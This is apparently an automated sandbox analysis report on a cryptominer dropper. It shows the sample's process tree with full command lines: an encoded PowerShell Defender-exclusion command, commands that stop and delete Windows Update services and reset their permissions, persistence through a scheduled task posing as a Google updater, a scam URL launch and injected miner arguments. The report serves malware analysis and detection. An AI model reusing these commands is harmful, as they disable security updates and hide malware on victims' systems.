Analysis

  • max time kernel
    299s
  • max time network
    289s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    27-06-2022 04:33

General

  • Target

    e368dd29cf385103ed8df8ef9ff221be7c0f81ac56efffdad485bb141bbb9dec.exe

  • Size

    7.4MB

  • MD5

    34719a80e9cca827371d5f1e44f10168

  • SHA1

    3ea872bd581ce47505a312d74f6b0e897202d021

  • SHA256

    e368dd29cf385103ed8df8ef9ff221be7c0f81ac56efffdad485bb141bbb9dec

  • SHA512

    2f96ffcb8a45d7dcb525c952e63cdd466ed60eb6bc624756f4c9d815ea40c2fe14da9e4905f7494db24d02c83354b8759adf677ea3c75b986626a376b0a53acf

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner Payload 13 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 13 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 46 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e368dd29cf385103ed8df8ef9ff221be7c0f81ac56efffdad485bb141bbb9dec.exe
    "C:\Users\Admin\AppData\Local\Temp\e368dd29cf385103ed8df8ef9ff221be7c0f81ac56efffdad485bb141bbb9dec.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:848
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:940
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1944
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHUAbAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAbABlACMAPgA="
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1620
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "PAAjAHUAbAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAbABlACMAPgA="
            5⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1556
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1444
          • C:\Windows\system32\sc.exe
            sc stop UsoSvc
            5⤵
            • Launches sc.exe
            PID:1604
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            5⤵
            • Launches sc.exe
            PID:1948
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            5⤵
            • Launches sc.exe
            PID:1300
          • C:\Windows\system32\sc.exe
            sc stop bits
            5⤵
            • Launches sc.exe
            PID:580
          • C:\Windows\system32\sc.exe
            sc stop dosvc
            5⤵
            • Launches sc.exe
            PID:1904
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
            5⤵
            • Modifies registry key
            PID:2012
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
            5⤵
            • Modifies registry key
            PID:2004
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
            5⤵
            • Modifies security service
            • Modifies registry key
            PID:2008
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
            5⤵
            • Modifies registry key
            PID:2024
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
            5⤵
            • Modifies registry key
            PID:1520
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:1376
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:1584
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:2020
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:2012
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1124
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:888
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
            5⤵
              PID:904
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
              5⤵
                PID:740
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                5⤵
                  PID:1556
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                  5⤵
                    PID:1520
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                    5⤵
                      PID:696
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                      5⤵
                        PID:592
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                        5⤵
                          PID:1240
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:320
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:940
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:624
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2020
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1124
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
                        4⤵
                          PID:580
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
                            5⤵
                            • Creates scheduled task(s)
                            PID:1476
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                          4⤵
                            PID:624
                            • C:\Windows\system32\schtasks.exe
                              schtasks /run /tn "GoogleUpdateTaskMachineQC"
                              5⤵
                                PID:2000
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ""C:\Windows\Temp\run.bat" "
                          2⤵
                          • Drops startup file
                          PID:936
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ""C:\Windows\Temp\lol.bat" "
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1760
                          • C:\Program Files\Internet Explorer\iexplore.exe
                            "C:\Program Files\Internet Explorer\iexplore.exe" https://take-realprize.life/?u=lq1pd08&o=hdck0gl
                            3⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SetWindowsHookEx
                            • Suspicious use of WriteProcessMemory
                            PID:1880
                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1880 CREDAT:275457 /prefetch:2
                              4⤵
                              • Modifies Internet Explorer settings
                              • Suspicious use of SetWindowsHookEx
                              PID:524
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {DF3320C9-52F6-429D-AED8-D93DAD8C2FB6} S-1-5-18:NT AUTHORITY\System:Service:
                        1⤵
                        • Loads dropped DLL
                        PID:2012
                        • C:\Program Files\Chrome\updater.exe
                          "C:\Program Files\Chrome\updater.exe"
                          2⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Executes dropped EXE
                          • Checks BIOS information in registry
                          • Checks whether UAC is enabled
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:2004
                          • C:\Windows\System32\conhost.exe
                            "C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
                            3⤵
                            • Drops file in Drivers directory
                            • Suspicious use of SetThreadContext
                            • Drops file in Program Files directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1520
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHUAbAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAbABlACMAPgA="
                              4⤵
                                PID:1444
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -EncodedCommand "PAAjAHUAbAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAbABlACMAPgA="
                                  5⤵
                                  • Drops file in System32 directory
                                  • Modifies data under HKEY_USERS
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2032
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                4⤵
                                  PID:624
                                  • C:\Windows\system32\sc.exe
                                    sc stop UsoSvc
                                    5⤵
                                    • Launches sc.exe
                                    PID:1692
                                  • C:\Windows\system32\sc.exe
                                    sc stop WaaSMedicSvc
                                    5⤵
                                    • Launches sc.exe
                                    PID:860
                                  • C:\Windows\system32\sc.exe
                                    sc stop wuauserv
                                    5⤵
                                    • Launches sc.exe
                                    PID:936
                                  • C:\Windows\system32\sc.exe
                                    sc stop bits
                                    5⤵
                                    • Launches sc.exe
                                    PID:1264
                                  • C:\Windows\system32\sc.exe
                                    sc stop dosvc
                                    5⤵
                                    • Launches sc.exe
                                    PID:1968
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1476
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1308
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1924
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1752
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                    5⤵
                                    • Modifies registry key
                                    PID:2004
                                  • C:\Windows\system32\takeown.exe
                                    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                    5⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1456
                                  • C:\Windows\system32\icacls.exe
                                    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                    5⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    PID:320
                                  • C:\Windows\system32\reg.exe
                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1356
                                  • C:\Windows\system32\reg.exe
                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1504
                                  • C:\Windows\system32\reg.exe
                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1560
                                  • C:\Windows\system32\reg.exe
                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                    5⤵
                                    • Modifies registry key
                                    PID:612
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                    5⤵
                                      PID:2000
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                      5⤵
                                        PID:1100
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                        5⤵
                                          PID:1736
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                          5⤵
                                            PID:1764
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                            5⤵
                                              PID:2024
                                            • C:\Windows\system32\schtasks.exe
                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                              5⤵
                                                PID:1556
                                              • C:\Windows\system32\schtasks.exe
                                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                5⤵
                                                  PID:1588
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                4⤵
                                                  PID:1320
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -hibernate-timeout-ac 0
                                                    5⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2040
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -hibernate-timeout-dc 0
                                                    5⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1728
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -standby-timeout-ac 0
                                                    5⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1108
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -standby-timeout-dc 0
                                                    5⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1736
                                                • C:\Windows\System32\conhost.exe
                                                  C:\Windows\System32\conhost.exe
                                                  4⤵
                                                    PID:1456
                                                    • C:\Windows\System32\conhost.exe
                                                      "C:\Windows\System32\conhost.exe" "ojfwdlyws"
                                                      5⤵
                                                        PID:1108
                                                    • C:\Windows\explorer.exe
                                                      C:\Windows\explorer.exe lvsbssvxocugcs1 aL9rWj13blqq3tQ6pq9BT64AEBTmmOZm2QnBzGRIrKyPM+h6GrlnTiw+84eQ+CjWwBvkP87y7fXUxvpWV+HOpwb4PFo0jfTYPIt8JLgpwB1l8+CPbjc8h5MGxwyuTAey5biMSNMXOCtrSwCAFGci43+J3ydPNcojjZuAczbPZ1dBIQ5NqMMQgtC0jINPHoADVgFiGvBTZc3nZKTrcuq8D5Q6HIf/EjJVDZjRZCe1iTbxWAKxZYSidMYzSzljVILede0zBXD0QgA8LeNhccfrjoe1LDMwWWGAFofnDuXZvQ3zrdnSD+cO2tUeQFc0Iw9P0SaQPBUTVX71xc7K3LubObahCWMZVHkFICc50uU8YhqdqKLvSuv0ElS+058KBhG7RyHoxTloFDhNM+dRe4uyDTloLV41p4EJnfF4X9pUtMZNFP5RMoJ0pPwpeeM2damF
                                                      4⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2020

                                              Network

                                              MITRE ATT&CK Matrix ATT&CK v6

                                              Execution

                                              Scheduled Task

                                              1
                                              T1053

                                              Persistence

                                              Modify Existing Service

                                              2
                                              T1031

                                              Scheduled Task

                                              1
                                              T1053

                                              Privilege Escalation

                                              Scheduled Task

                                              1
                                              T1053

                                              Defense Evasion

                                              Modify Registry

                                              3
                                              T1112

                                              Virtualization/Sandbox Evasion

                                              1
                                              T1497

                                              Impair Defenses

                                              1
                                              T1562

                                              File Permissions Modification

                                              1
                                              T1222

                                              Discovery

                                              Query Registry

                                              2
                                              T1012

                                              Virtualization/Sandbox Evasion

                                              1
                                              T1497

                                              System Information Discovery

                                              3
                                              T1082

                                              Impact

                                              Service Stop

                                              1
                                              T1489

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Program Files\Chrome\updater.exe
                                                Filesize

                                                7.1MB

                                                MD5

                                                e85216c5e3420493ea698778ccf16073

                                                SHA1

                                                ae034212c790f7181ea92426a5dcc08cafd0b711

                                                SHA256

                                                d007ef5a94993c5e069e8e41e324e811146d956b15db0e04916798b84a7cd28d

                                                SHA512

                                                8b9356da7d6ec043c94a6542c324ca7c9861038c2015ab051e1c3dfd25dc3a4cbd8684f396b66577c7d6ae89e09bc98df6fc82a2796f3c56658f5f321ccb3f45

                                              • C:\Program Files\Chrome\updater.exe
                                                Filesize

                                                7.1MB

                                                MD5

                                                e85216c5e3420493ea698778ccf16073

                                                SHA1

                                                ae034212c790f7181ea92426a5dcc08cafd0b711

                                                SHA256

                                                d007ef5a94993c5e069e8e41e324e811146d956b15db0e04916798b84a7cd28d

                                                SHA512

                                                8b9356da7d6ec043c94a6542c324ca7c9861038c2015ab051e1c3dfd25dc3a4cbd8684f396b66577c7d6ae89e09bc98df6fc82a2796f3c56658f5f321ccb3f45

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                Filesize

                                                60KB

                                                MD5

                                                308336e7f515478969b24c13ded11ede

                                                SHA1

                                                8fb0cf42b77dbbef224a1e5fc38abc2486320775

                                                SHA256

                                                889b832323726a9f10ad03f85562048fdcfe20c9ff6f9d37412cf477b4e92ff9

                                                SHA512

                                                61ad97228cd6c3909ef3ac5e4940199971f293bdd0d5eb7916e60469573a44b6287c0fa1e0b6c1389df35eb6c9a7d2a61fdb318d4a886a3821ef5a9dab3ac24f

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                Filesize

                                                342B

                                                MD5

                                                0f63fa953e1a6822e6faeec6f16ed1d5

                                                SHA1

                                                eea74e494f95d471c5245e69f54329bddffeddbc

                                                SHA256

                                                44325b686ee943334034175e30dff0484874e71689dade52860264f4f3e871b3

                                                SHA512

                                                ab3065a4d66bd3fda65ade7b200d92327100e7dddb3698689ec8034387caace2b545fe5ff93334e12cbf1c30383eb7ee53afdf6718c714609a968d2d42ffa057

                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\H35VHC82.txt
                                                Filesize

                                                608B

                                                MD5

                                                8ceddf4a02087fcdece8afd3587d2cb5

                                                SHA1

                                                b3c2ebca718217a90e54a4126798cbe090fe9291

                                                SHA256

                                                8e029ba95913281bba50692b8e88079fc80ff596631d3c3a16be856522251bcd

                                                SHA512

                                                6ccd92a5c82cfdbee60e13cf638c388d0366debd8ed22b9143d0f011efdf1da00c7c299f5cced9ae92adf2888d549643fc3daf3d4cde896b7d329071074cbd3c

                                              • C:\Windows\Temp\lol.bat
                                                Filesize

                                                59B

                                                MD5

                                                f580e0e80cc87b25e38ea2c0c8059d04

                                                SHA1

                                                299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                                SHA256

                                                9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                                SHA512

                                                5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                              • C:\Windows\Temp\run.bat
                                                Filesize

                                                98B

                                                MD5

                                                731afe244b2414169a5f630d52646e56

                                                SHA1

                                                e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                                SHA256

                                                6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                                SHA512

                                                84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

                                              • C:\Windows\Temp\setup.exe
                                                Filesize

                                                7.1MB

                                                MD5

                                                e85216c5e3420493ea698778ccf16073

                                                SHA1

                                                ae034212c790f7181ea92426a5dcc08cafd0b711

                                                SHA256

                                                d007ef5a94993c5e069e8e41e324e811146d956b15db0e04916798b84a7cd28d

                                                SHA512

